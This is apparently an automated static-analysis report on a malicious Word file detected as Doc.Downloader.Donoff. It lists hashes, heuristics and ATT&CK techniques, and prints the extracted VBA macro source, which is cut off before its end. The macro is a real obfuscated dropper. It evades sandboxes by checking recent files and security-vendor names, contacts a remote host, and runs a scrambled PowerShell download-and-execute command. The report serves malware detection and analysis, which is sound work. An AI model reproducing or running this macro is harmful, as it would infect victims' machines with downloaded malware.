Doc.Downloader.Donoff — Office (OOXML) malware analysis

Static analysis result for SHA-256 513b0c9ca75d6c86…

MALICIOUS

Office (OOXML)

57.9 KB · Created: 2016-08-31 11:22:00 UTC · Authoring application: Microsoft Office Word 15.0000 · First seen: 2019-04-18
MD5: 44400b377a6c7458bbc030700279912f SHA-1: 72a3e5500f0d82ee6fe73eab1dc3220440b11dd2 SHA-256: 513b0c9ca75d6c86ce9ae8010497b0a78c0737a3e64ae498dfef8667fcd47cfd
Risk Score: 202

Malware Insights

Doc.Downloader.Donoff · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This document contains VBA macros that use the CreateObject function to instantiate a COM object, likely in order to execute a second-stage payload. The reconstructed command string indicates an attempt to download and execute a file, potentially from a remote source. The ClamAV detection of 'Doc.Downloader.Donoff' further supports this assessment.

Heuristics 5

  • ClamAV: Doc.Downloader.Donoff-6755231-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6755231-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL · Channel
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas · In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 · In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships · In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing · In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing · In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml · In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape · In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4329 bytes
SHA-256: fb646767b0a6c341fc17c04cae46fb1ef30a4808c6203401c2c9b0230aaa1c85
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim zDlav As String
Dim szkCF As Integer
Dim JZCzxx As Boolean
Public Sub InkPicture1_Painted(ByVal eoWxm As Long, ByVal sKgziMY As IInkRectangle)
On Error GoTo xZFHq
If JZCzxx Then Exit Sub
JZCzxx = True
FvtbP
Exit Sub
xZFHq:
End Sub
Public Sub FvtbP()
If uTfvKjw Then Error 101
If QQhNk Then Error 102
Set YvyRX = CvOEb(CreateObject(d(124, 99, "ihStlrSWpec.l")))
MNoGPF YvyRX.Run(LeuHfAn, 0)
Exit Sub
End Sub
Public Function CvOEb(ByVal AdaZLn)
Set CvOEb = AdaZLn
End Function
Public Function kghYI() As String
kghYI = d(198, 635, "etnlyys-nwy dncmdore.eEciPi psWdSlHd oa wsle xuoocBa ioteie-mnpehlx-")
End Function
Public Function LeuHfAn() As String
LeuHfAn = kghYI & rldyMjS
End Function
Public Function rldyMjS() As String
rldyMjS = d(600, 1537, "o'bcEy]eO.tlsit eiet:aje.(pooftt(meec.ohl/f;-SfIT) enteicNoe$.m(yCo:ur3w l=aFetid/fs5OS.Shl-mnie/f,jrxs:NbN)euc/$cpceGmetD'anf) .$.t(tWwtvmi(ch)Oe;SblplceemlfPpNsla/.o6-W)[tiweeFpi")
End Function
Public Function OqNqk() As Integer
OqNqk = Application.RecentFiles.Count
End Function
Public Function uTfvKjw() As Boolean
uTfvKjw = 3 > OqNqk
End Function
Public Function QQhNk() As Boolean
zDlav = UCase(pIITYW)
For Each BlrEW In ybBvg
If InStr(zDlav, UCase(BlrEW)) <> 0 Then GoTo HsWpH
Next
Exit Function
HsWpH:
QQhNk = True
End Function
Public Function ybBvg()
ybBvg = Array(d(76, 41, "SaS HVO"), d(27, 87, "gAssemsBaLe"), d(85, 88, "DteaDcdie"), d(98, 113, "dCR reMONIT"), d(54, 29, "RTIOeTfN"), _
d(6, 23, "CCSOI"), d(33, 31, "ImTsaCEM"), d(57, 11, "rOfNeC"), d(11, 53, "OrItrop N"), d(12, 108, "edCr eATTNA"), _
d(11, 74, "O pAalLto"), d(21, 27, "RpTOoinR"), d(78, 39, "AtiPsOhl"), d(21, 109, "rtorcIMDnE"), d(45, 65, "trZhNee"), _
d(76, 59, "AKpcRCsaE"), d(108, 109, "etnEcATADR"), d(57, 55, "eSYTiRuc"), d(70, 94, "wSREAtutV"), d(168, 78, "nRoOlNogG ItEeSCsHt"), _
d(101, 73, "CfIEonpRtO"), d(36, 27, "VnNORegemT"), d(161, 57, "MtSaocpebCAourLkK"), d(25, 19, "RAYM"), d(108, 83, "caRETenADt"), _
d(51, 83, "STAvEner"), d(48, 89, "rCimTFOSo"), d(94, 57, "OS,pETsLE "), d(63, 39, "PSIHhC.DeE"), d(18, 29, "eslWabEe"), _
d(53, 65, "LOOHCs"), d(59, 65, "nOZAma"), d(18, 33, "dLuCo"), d(29, 62, "IfEyEER"), d(67, 27, "ItsohGN"), _
d(26, 41, "ElacSzR"), d(40, 73, "AmTUvvl"), d(45, 159, "ROwTeneSIDArapSK"), d(79, 37, "VsyiRTneIU"), d(120, 14, "eDiFETERDnB"), _
d(84, 23, "eCaBU otL"), d(98, 92, "MnoounsYA"), d(12, 19, "CEDImINe"), d(43, 41, "ohDETs"), d(96, 97, "opNrFiPoOT"), _
d(67, 27, "eLCuNRA"), d(78, 15, "aOCEuLbT"), d(27, 27, "ADSu"), d(107, 97, " sUnmrpd..tEtaE"), d(27, 17, "VrEsRE"))
End Function
Public Function pIITYW() As String
Set LykhZl = CreateObject(d(160, 279, "WetRWH..uHp1ntpqnt.isteit5"))
LykhZl.Open d(5, 20, "TEG"), d(227, 437, "eswx.g///t/mnmi.th:wmcevcmpwad/p1yt/.ioo2i"), False
LykhZl.SetRequestHeader d(54, 25, "rreeeRf"), d(401, 332, "/-weawndw/d.lrmoeacsxasmthietn-tdmp.ysc-:oi/mp/")
LykhZl.SetRequestHeader d(35, 33, "AetgrUe-sn"), d(277, 439, "TT/z.p;1iN to5me W ;nM/olE s1e)acbI;w.d0l(iS0o6i.l tM.d r6i0a 0n")
LykhZl.Send
If LykhZl.Status <> 200 Then Error 201
pIITYW = LykhZl.ResponseText
End Function
Public Function BdsnSrz(ByVal RCOQxjf As Integer, ByVal VoLhLw As String, ByVal YozKyX As Integer) As String
szkCF = yYAhhG(RCOQxjf, Len(VoLhLw))
Do While Len(BdsnSrz) < Len(VoLhLw)
BdsnSrz = BdsnSrz & yocwbVF(VoLhLw, szkCF)
szkCF = yYAhhG((szkCF + YozKyX), Len(VoLhLw))
Loop
End Function
Public Function yocwbVF(ByVal kQCYpW As String, ByVal szkCF As Integer) As String
yocwbVF = Right(MNoGPF(Left(kQCYpW, szkCF + 1)), 1)
End Function
Public Function yYAhhG(ByVal RClqrS As Integer, ByVal HrRNZ As Integer) As Integer
yYAhhG = RClqrS - (HrRNZ * (RClqrS \ HrRNZ))
End Function
Public Function d(ByVal RCOQxjf As Integer, B
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 18944 bytes
SHA-256: efe96b9b2d313ac0261cbb0207ba9073cf24969c44f94f03778c0d0325aacaad
Detection
ClamAV: Doc.Downloader.Donoff-6755231-0
Obfuscation or payload: unlikely